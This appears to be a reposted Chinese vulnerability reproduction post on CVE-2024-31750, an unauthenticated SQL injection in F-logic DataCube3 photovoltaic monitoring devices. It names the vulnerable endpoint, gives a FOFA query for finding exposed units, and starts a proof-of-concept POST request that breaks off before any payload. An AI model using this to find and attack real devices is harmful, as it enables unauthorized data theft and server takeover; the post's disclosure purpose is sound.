F-logic DataCube3 SQL注入漏洞复现(CVE-2024-31750)
0x01 产品简介
F-logic DataCube3是一款用于光伏发电系统的紧凑型终端测量系统。
0x02 漏洞概述
F-logic DataCube3 /admin/pr_monitor/getting_index_data.php 接口处存在SQL注入漏洞,未经身份验证的攻击者可通过该漏洞获取数据库敏感信息,深入利用可控制整个web服务器。
0x03 影响范围
F-logic DataCube3测量系统版本1.0
0x04 复现环境
FOFA:title=="DataCube3"
0x05 漏洞复现
PoC
POST /admin/pr_monitor/getting_index_data.php HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0
Accept: text/html,application/xhtm
原文地址:https://blog.csdn.net/qq_41904294/article/details/138006405
免责声明:本站文章内容转载自网络资源,如本站内容侵犯了原著者的合法权益,可联系本站删除。更多内容请关注自学内容网(zxcms.com)!